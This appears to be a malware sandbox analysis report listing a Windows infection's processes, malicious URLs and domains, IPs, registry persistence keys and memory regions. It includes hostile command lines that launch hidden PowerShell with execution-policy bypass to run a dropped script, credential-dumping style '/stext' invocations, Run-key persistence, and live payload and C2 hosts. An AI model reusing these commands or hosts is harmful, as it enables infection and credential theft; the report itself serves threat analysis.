C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 28 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://paste.ee/d/d80GV/0
188.114.96.3
malicious
http://ftp.desckvbrat.com.br
unknown
malicious
http://desckvbrat.com.br
unknown
malicious
hjnourt38haoust1.duckdns.org
malicious
iwarsut775laudrye3.duckdns.org
malicious
iwarsut775laudrye001.duckdns.org
malicious
https://b2case.com/class.txt
188.114.96.3
malicious
https://paste.ee/d/r322U/0
188.114.96.3
malicious
https://paste.ee/d/jm8qu/0
188.114.96.3
malicious
http://www.microsoft.co
unknown
https://contoso.com/License
unknown
https://b2case.com
unknown
https://analytics.paste.ee
unknown
https://paste.ee
unknown
https://aka.ms/pscore6
unknown
https://pastebin.com/raw/pQQ0n3eA
104.20.4.235
https://www.google.com
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://paste.ee/d/jm8qu/08
unknown
https://oneget.orgX
unknown
https://login.yahoo.com/config/login
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
https://paste.ee/d/jm8qu/0P
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://paste.ee
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://www.google.com;
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://github.com/Pester/Pester
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://b2case.com
unknown
http://geoplugin.net/
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://analytics.paste.ee;
unknown
https://www.google.com/accounts/servicelogin
unknown
https://aka.ms/pscore68
unknown
https://paste.ee/d/d80GV/0P
unknown
http://pastebin.com
unknown
https://pastebin.com
unknown
https://themes.googleusercontent.com
unknown
https://oneget.org
unknown
http://crl.micros
unknown
http://www.ebuddy.com
unknown
There are 44 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
paste.ee
188.114.96.3
malicious
desckvbrat.com.br
191.252.83.213
malicious
b2case.com
188.114.96.3
malicious
pastebin.com
104.20.4.235
malicious
iwarsut775laudrye001.duckdns.org
43.226.229.232
malicious
ftp.desckvbrat.com.br
unknown
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
104.20.4.235
pastebin.com
United States
malicious
188.114.96.3
paste.ee
European Union
malicious
43.226.229.232
iwarsut775laudrye001.duckdns.org
Hong Kong
malicious
191.252.83.213
desckvbrat.com.br
Brazil
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Update Drivers NVIDEO_zhs
malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Update Drivers NVIDEO_fdm
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\shietgtst-DDGG2A
exepath
HKEY_CURRENT_USER\SOFTWARE\shietgtst-DDGG2A
licence
HKEY_CURRENT_USER\SOFTWARE\shietgtst-DDGG2A
time
There are 9 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1E3B1150000
trusted library allocation
page read and write
malicious
F18000
heap
page read and write
malicious
1AB99541000
trusted library allocation
page read and write
malicious
1AB99151000
trusted library allocation
page read and write
malicious
1B33CDBE000
trusted library allocation
page read and write
malicious
2803C402000
trusted library allocation
page read and write
malicious
1A890401000
trusted library allocation
page read and write
malicious
1C222A41000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
1E3A0D50000
trusted library allocation
page read and write
15B80AF4000
trusted library allocation
page read and write
1B32D0FE000
trusted library allocation
page read and write
34577F000
stack
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2203C6BE000
trusted library allocation
page read and write
18ACDFF0000
trusted library allocation
page read and write
2804C201000
trusted library allocation
page read and write
1B32CB41000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
15B80BA5000
trusted library allocation
page read and write
2203A4E8000
heap
page read and write
15BF8770000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
2803D18A000
trusted library allocation
page read and write
7FFD9BA2A000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
1E3B9276000
heap
page execute and read and write
1B32D0B0000
trusted library allocation
page read and write
1E39EDD0000
heap
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
14D0000
heap
page read and write
1A8F9550000
heap
page read and write
1E3B9069000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
2D4D5110000
trusted library allocation
page read and write
2803CF55000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
15B80B24000
trusted library allocation
page read and write
28054873000
heap
page read and write
1E3B0F4F000
trusted library allocation
page read and write
15B80A3E000
trusted library allocation
page read and write
1B32D0A0000
trusted library allocation
page read and write
1E3B91E0000
heap
page execute and read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9B931000
trusted library allocation
page read and write
2203BD92000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
15BF9047000
heap
page execute and read and write
1B32AAA4000
heap
page read and write
1B32D355000
trusted library allocation
page read and write
1B32D245000
trusted library allocation
page read and write
234EABB4000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1B32CFD1000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
15C8855C000
heap
page read and write
1B32D322000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
45C000
system
page execute and read and write
1B32D0C4000
trusted library allocation
page read and write
15B80C05000
trusted library allocation
page read and write
1C212AF9000
trusted library allocation
page read and write
7FFD9BA80000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1ABA117E000
heap
page read and write
D90000
heap
page read and write
7FFD9BA1D000
trusted library allocation
page read and write
1C22A970000
heap
page execute and read and write
15B80AAA000
trusted library allocation
page read and write
1E3A13EA000
trusted library allocation
page read and write
2203D50F000
trusted library allocation
page read and write
7FFD9B830000
trusted library allocation
page execute and read and write
15B8002F000
trusted library allocation
page read and write
1B32D425000
trusted library allocation
page read and write
7FFD9B7B0000
trusted library allocation
page read and write
234E8DEB000
heap
page read and write
22054440000
heap
page read and write
18ACC1D5000
heap
page read and write
1B32D0FB000
trusted library allocation
page read and write
1A8F75C5000
heap
page read and write
7FFD9B794000
trusted library allocation
page read and write
1B33CBDD000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
15BF8E94000
heap
page read and write
18AE48A7000
heap
page execute and read and write
1B32D0C7000
trusted library allocation
page read and write
1418000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
1C212651000
trusted library allocation
page read and write
234EABFD000
heap
page read and write
15C8A060000
heap
page read and write
1E3B906B000
heap
page read and write
1B33CD5E000
trusted library allocation
page read and write
B692CFD000
stack
page read and write
15BF6DD5000
heap
page read and write
7FFD9B945000
trusted library allocation
page read and write
1A8804B9000
trusted library allocation
page read and write
2203C700000
trusted library allocation
page read and write
15B80AA2000
trusted library allocation
page read and write
AA8000
heap
page read and write
91C000
stack
page read and write
2804C253000
trusted library allocation
page read and write
B6929CE000
stack
page read and write
2203A5AC000
heap
page read and write
7FFD9B942000
trusted library allocation
page read and write
280547A0000
heap
page execute and read and write
7FFD9BA20000
trusted library allocation
page read and write
1B32D276000
trusted library allocation
page read and write
1B32D33A000
trusted library allocation
page read and write
234E8C00000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
2D4D32A0000
heap
page read and write
6357FD000
stack
page read and write
2204C32C000
trusted library allocation
page read and write
1B32D30A000
trusted library allocation
page read and write
3CDE000
stack
page read and write
1B32D351000
trusted library allocation
page read and write
15BF9040000
heap
page execute and read and write
1C210653000
heap
page read and write
1B32CFD7000
trusted library allocation
page read and write
234EAE80000
heap
page read and write
2D4EB95D000
heap
page read and write
234EAE34000
heap
page read and write
15C88760000
heap
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
22054560000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
15BF6DF3000
heap
page read and write
7FFD9B84C000
trusted library allocation
page execute and read and write
1ABA13A8000
heap
page read and write
1C210560000
heap
page read and write
1A890029000
trusted library allocation
page read and write
1C2228C0000
trusted library allocation
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
15C887C0000
trusted library allocation
page read and write
15C9A678000
trusted library allocation
page read and write
1C210610000
heap
page read and write
7FFD9B780000
trusted library allocation
page read and write
2D4D1840000
heap
page read and write
950000
heap
page read and write
7FFD9BA40000
trusted library allocation
page read and write
15B80CE1000
trusted library allocation
page read and write
B692883000
stack
page read and write
280546E8000
heap
page read and write
1B32D116000
trusted library allocation
page read and write
27E6000
heap
page read and write
15B804F4000
trusted library allocation
page read and write
63668D000
stack
page read and write
ED0000
heap
page read and write
474000
remote allocation
page execute and read and write
ECF000
stack
page read and write
478000
remote allocation
page execute and read and write
2203A548000
heap
page read and write
7FFD9B91A000
trusted library allocation
page read and write
2FFF000
stack
page read and write
7FFD9BAE4000
trusted library allocation
page read and write
234EAE24000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
15B80BCE000
trusted library allocation
page read and write
2C6F000
stack
page read and write
234EAC8C000
heap
page read and write
15B80C3B000
trusted library allocation
page read and write
1B32D1D3000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
B7355DF000
stack
page read and write
1E3B10F0000
trusted library allocation
page read and write
1AB991B3000
trusted library allocation
page read and write
15BF879A000
heap
page read and write
1B32D3A4000
trusted library allocation
page read and write
3175E7F000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
2A20000
heap
page read and write
15B80A84000
trusted library allocation
page read and write
15C8A381000
trusted library allocation
page read and write
15C9A3CC000
trusted library allocation
page read and write
15B80B61000
trusted library allocation
page read and write
7FFD9B972000
trusted library allocation
page read and write
1A8F7600000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
317647C000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
1B32D32E000
trusted library allocation
page read and write
1C212F41000
trusted library allocation
page read and write
1430000
heap
page read and write
1B32D11A000
trusted library allocation
page read and write
1B32D18C000
trusted library allocation
page read and write
1B32AB50000
heap
page read and write
1E3B92D0000
heap
page read and write
1B32D250000
trusted library allocation
page read and write
2203DC0E000
trusted library allocation
page read and write
2803DA0D000
trusted library allocation
page read and write
2203A490000
trusted library allocation
page read and write
7FFD9B78B000
trusted library allocation
page read and write
29AF000
stack
page read and write
7FFD9B955000
trusted library allocation
page read and write
1E3B9270000
heap
page execute and read and write
1B32D07D000
trusted library allocation
page read and write
15CA2962000
heap
page read and write
2803C1E1000
trusted library allocation
page read and write
1B32D155000
trusted library allocation
page read and write
29025FC000
stack
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
DE0000
heap
page read and write
FF5000
heap
page read and write
15C8B385000
trusted library allocation
page read and write
7FFD9B952000
trusted library allocation
page read and write
8FC000
stack
page read and write
68E4CC5000
stack
page read and write
1B32AADD000
heap
page read and write
18ACCFE3000
trusted library allocation
page read and write
1B32D2F7000
trusted library allocation
page read and write
1ABA11B9000
heap
page read and write
1B32AB0F000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
7FFD9B962000
trusted library allocation
page read and write
1E39EF5A000
heap
page read and write
7FFD9B84E000
trusted library allocation
page execute and read and write
2803C0C0000
heap
page readonly
3176FCC000
stack
page read and write
15C8A340000
heap
page read and write
9CA2C7C000
stack
page read and write
15B80B92000
trusted library allocation
page read and write
1B32AB4D000
heap
page read and write
220548F0000
heap
page read and write
1B32D231000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
103C000
stack
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
27C0000
heap
page read and write
15C8BB04000
trusted library allocation
page read and write
2D4D3320000
trusted library allocation
page read and write
2203DBA6000
trusted library allocation
page read and write
2D4D32E3000
trusted library allocation
page read and write
1B32D3D7000
trusted library allocation
page read and write
2A9190F0000
heap
page read and write
1E3B90BF000
heap
page read and write
2A919390000
heap
page read and write
3220000
heap
page read and write
15B8007E000
trusted library allocation
page read and write
1B32D239000
trusted library allocation
page read and write
15C88720000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
B735873000
stack
page read and write
1AB88AB0000
trusted library allocation
page read and write
7FFD9B911000
trusted library allocation
page read and write
54702FF000
stack
page read and write
2803D3B7000
trusted library allocation
page read and write
1B32D066000
trusted library allocation
page read and write
2203C510000
trusted library allocation
page read and write
15CA26D0000
heap
page read and write
1ABA1260000
heap
page read and write
1C212B6A000
trusted library allocation
page read and write
2803E00A000
trusted library allocation
page read and write
234E8DFD000
heap
page read and write
7FFD9B975000
trusted library allocation
page read and write
459000
system
page execute and read and write
15BF9010000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
18ADC3B1000
trusted library allocation
page read and write
3457FE000
stack
page read and write
2203C508000
trusted library allocation
page read and write
1E3B92B4000
heap
page read and write
970000
heap
page read and write
1C210643000
heap
page read and write
15C8A150000
heap
page execute and read and write
9CA2532000
stack
page read and write
7FFD9BAF8000
trusted library allocation
page read and write
B692E7E000
stack
page read and write
31764FE000
stack
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1C2226B3000
trusted library allocation
page read and write
1AB871B5000
heap
page read and write
9CA2CF8000
stack
page read and write
18AE47CD000
heap
page read and write
1AB87058000
heap
page read and write
15B80C95000
trusted library allocation
page read and write
1B32D0C0000
trusted library allocation
page read and write
15B80C46000
trusted library allocation
page read and write
2803CDD7000
trusted library allocation
page read and write
2803C0D0000
trusted library allocation
page read and write
7FFD9B94A000
trusted library allocation
page read and write
2803A660000
heap
page read and write
F88000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
2D4E3544000
trusted library allocation
page read and write
7DF3FF060000
trusted library allocation
page execute and read and write
7FFD9B76D000
trusted library allocation
page execute and read and write
15C9A68A000
trusted library allocation
page read and write
7FFD9BA7A000
trusted library allocation
page read and write
2803A796000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1AB895E9000
trusted library allocation
page read and write
15C8B2DF000
trusted library allocation
page read and write
ED8000
heap
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
1E3B9290000
heap
page read and write
D40000
heap
page read and write
7FFD9B970000
trusted library allocation
page read and write
1B32D0AC000
trusted library allocation
page read and write
15B8005F000
trusted library allocation
page read and write
2804C4D8000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
1B32D3EE000
trusted library allocation
page read and write
18AE49C6000
heap
page read and write
1A8F9740000
heap
page execute and read and write
2D4D1916000
heap
page read and write
7FFD9B78B000
trusted library allocation
page read and write
E1C34C3000
stack
page read and write
2803D301000
trusted library allocation
page read and write
1A8F7580000
heap
page read and write
7FFD9B912000
trusted library allocation
page read and write
1B344C16000
heap
page read and write
1AB895D7000
trusted library allocation
page read and write
18AE471C000
heap
page read and write
7FFD9BA30000
trusted library allocation
page read and write
1B32D2A8000
trusted library allocation
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page execute and read and write
68E61CD000
stack
page read and write
7FFD9B840000
trusted library allocation
page execute and read and write
1C2125B0000
heap
page execute and read and write
9CA29FB000
stack
page read and write
2203D14E000
trusted library allocation
page read and write
376D000
stack
page read and write
15B800B0000
trusted library allocation
page read and write
1B32D3F6000
trusted library allocation
page read and write
BDC000
stack
page read and write
234EAEA1000
heap
page read and write
7FFD9B820000
trusted library allocation
page execute and read and write
1170000
heap
page read and write
15C9A3B1000
trusted library allocation
page read and write
1B32D2FB000
trusted library allocation
page read and write
D6F000
stack
page read and write
7FFD9B793000
trusted library allocation
page execute and read and write
15C8C15E000
trusted library allocation
page read and write
1B32D316000
trusted library allocation
page read and write
7FFD9B81C000
trusted library allocation
page execute and read and write
B735F7D000
stack
page read and write
15B80B2D000
trusted library allocation
page read and write
7FFD9B960000
trusted library allocation
page execute and read and write
68E51FB000
stack
page read and write
2204C744000
trusted library allocation
page read and write
27F9000
heap
page read and write
1B32D0EB000
trusted library allocation
page read and write
15C88620000
heap
page read and write
2203C690000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
1E3B8FE0000
heap
page read and write
1B32D0F7000
trusted library allocation
page read and write
15B8053A000
trusted library allocation
page read and write
2D4D1860000
heap
page read and write
2D4EBCA2000
heap
page read and write
1C22A768000
heap
page read and write
2203C080000
heap
page execute and read and write
31761F6000
stack
page read and write
7FFD9BAE9000
trusted library allocation
page read and write
1B32D3FE000
trusted library allocation
page read and write
2D4D3385000
heap
page read and write
1A880716000
trusted library allocation
page read and write
1E39EF1C000
heap
page read and write
15B80C16000
trusted library allocation
page read and write
635185000
stack
page read and write
1AB8713F000
heap
page read and write
1C212450000
trusted library allocation
page read and write
AA0000
heap
page read and write
234EAEA0000
heap
page read and write
7FFD9B774000
trusted library allocation
page read and write
1C22A9C0000
heap
page read and write
1B32D05E000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1C22AA08000
heap
page read and write
2D4E34D1000
trusted library allocation
page read and write
1B32D225000
trusted library allocation
page read and write
7FFD9B826000
trusted library allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
2203A3F0000
heap
page read and write
1B32D20A000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
15BE03F000
stack
page read and write
1E3A1389000
trusted library allocation
page read and write
2203C6EC000
trusted library allocation
page read and write
1C22A9D9000
heap
page read and write
1C212641000
trusted library allocation
page read and write
CFC000
stack
page read and write
234EAAD0000
heap
page read and write
1B33CB69000
trusted library allocation
page read and write
2803A79A000
heap
page read and write
1B32CB30000
heap
page execute and read and write
7FFD9BBB0000
trusted library allocation
page read and write
15BF6EC0000
heap
page read and write
7FFD9BA54000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
9CA2D79000
stack
page read and write
1B32D2A4000
trusted library allocation
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
1B32D431000
trusted library allocation
page read and write
1AB88B90000
trusted library section
page read and write
7FFD9B77D000
trusted library allocation
page execute and read and write
2D4D1953000
heap
page read and write
131F000
stack
page read and write
1B32D1AB000
trusted library allocation
page read and write
1B32D1EE000
trusted library allocation
page read and write
68E5437000
stack
page read and write
12F9000
stack
page read and write
471000
remote allocation
page execute and read and write
2D4E3686000
trusted library allocation
page read and write
1B32D1DE000
trusted library allocation
page read and write
1B32D3D3000
trusted library allocation
page read and write
3B1F000
stack
page read and write
7FFD9B970000
trusted library allocation
page execute and read and write
1A8F74A0000
heap
page read and write
1B32D39C000
trusted library allocation
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
B6932FB000
stack
page read and write
15C88520000
heap
page read and write
B7359FE000
stack
page read and write
6359FE000
stack
page read and write
234EAE19000
heap
page read and write
B69298F000
stack
page read and write
1AB87240000
trusted library allocation
page read and write
18ACC1EF000
heap
page read and write
1E39EF14000
heap
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
2D4D3702000
trusted library allocation
page read and write
7FFD9B770000
trusted library allocation
page read and write
18ACA6F7000
heap
page read and write
A05E7BA000
stack
page read and write
234E8DEB000
heap
page read and write
2203D8A3000
trusted library allocation
page read and write
15BF9056000
heap
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1AB89652000
trusted library allocation
page read and write
1B32D41A000
trusted library allocation
page read and write
1A8F769B000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
31770CE000
stack
page read and write
15CA2A42000
heap
page read and write
15C8B559000
trusted library allocation
page read and write
15BF9050000
heap
page read and write
7FFD9B866000
trusted library allocation
page execute and read and write
2203C724000
trusted library allocation
page read and write
234EAE14000
heap
page read and write
2DED000
stack
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
6356FB000
stack
page read and write
1B32D2C4000
trusted library allocation
page read and write
1B32AB07000
heap
page read and write
1B32D2DF000
trusted library allocation
page read and write
2803A78E000
heap
page read and write
7FFD9B784000
trusted library allocation
page read and write
28054741000
heap
page read and write
15B80C7E000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
1AB87050000
heap
page read and write
2D4EB860000
heap
page read and write
1C2124D0000
trusted library allocation
page read and write
15B808A1000
trusted library allocation
page read and write
7FFD9BA72000
trusted library allocation
page read and write
1A8F9070000
trusted library allocation
page read and write
1170000
heap
page read and write
1ABA13A6000
heap
page read and write
2970000
heap
page read and write
15B80ADA000
trusted library allocation
page read and write
1C212AD6000
trusted library allocation
page read and write
18ACC080000
trusted library allocation
page read and write
7FFD9B91A000
trusted library allocation
page read and write
7FFD9BA90000
trusted library allocation
page read and write
45D000
system
page execute and read and write
15C8B0F9000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9BA8A000
trusted library allocation
page read and write
2D4D49A2000
trusted library allocation
page read and write
9CA2A7E000
stack
page read and write
7FFD9B970000
trusted library allocation
page read and write
1A8806D2000
trusted library allocation
page read and write
1B32D1E6000
trusted library allocation
page read and write
7FFD9B930000
trusted library allocation
page read and write
B735E7E000
stack
page read and write
234E8D30000
heap
page read and write
15B8077A000
trusted library allocation
page read and write
1E39F150000
heap
page read and write
1C222641000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1A88027E000
trusted library allocation
page read and write
7FFD9B820000
trusted library allocation
page read and write
1382000
heap
page read and write
18AE479E000
heap
page read and write
1C22AA68000
heap
page read and write
1E3A0EC0000
heap
page read and write
1C22AA0A000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1AB991DE000
trusted library allocation
page read and write
15C9A66C000
trusted library allocation
page read and write
9CA25FF000
stack
page read and write
18ACA6BD000
heap
page read and write
2803DFC0000
trusted library allocation
page read and write
2203A470000
trusted library allocation
page read and write
1A8F76C3000
heap
page read and write
1B344D76000
heap
page execute and read and write
2D4E34E0000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1AB88B60000
heap
page execute and read and write
1B32D40E000
trusted library allocation
page read and write
7FFD9B932000
trusted library allocation
page read and write
7FFD9BA1F000
trusted library allocation
page read and write
B735C79000
stack
page read and write
1E3B9280000
heap
page read and write
15C8B688000
trusted library allocation
page read and write
1A8F76DC000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
68E4D4F000
stack
page read and write
7FFD9B960000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
9DC000
stack
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
15B80C67000
trusted library allocation
page read and write
234EABFC000
heap
page read and write
1B32D12A000
trusted library allocation
page read and write
1B32D312000
trusted library allocation
page read and write
7FFD9B876000
trusted library allocation
page execute and read and write
2203DD5B000
trusted library allocation
page read and write
7FFD9B931000
trusted library allocation
page read and write
234EAF60000
heap
page read and write
1B32D141000
trusted library allocation
page read and write
2901FFC000
stack
page read and write
116E000
stack
page read and write
1ABA1215000
heap
page read and write
1B344EC2000
heap
page read and write
7FFD9BA03000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1E39EF1A000
heap
page read and write
7FFD9BAFC000
trusted library allocation
page read and write
3458FE000
stack
page read and write
1A8F76B7000
heap
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
1B32D090000
trusted library allocation
page read and write
1C212D10000
trusted library allocation
page read and write
28054A80000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9B990000
trusted library allocation
page read and write
234E8DFD000
heap
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B93A000
trusted library allocation
page read and write
1C212AE7000
trusted library allocation
page read and write
7FFD9B846000
trusted library allocation
page execute and read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9BA70000
trusted library allocation
page read and write
2203A4D5000
heap
page read and write
234E8D5F000
heap
page read and write
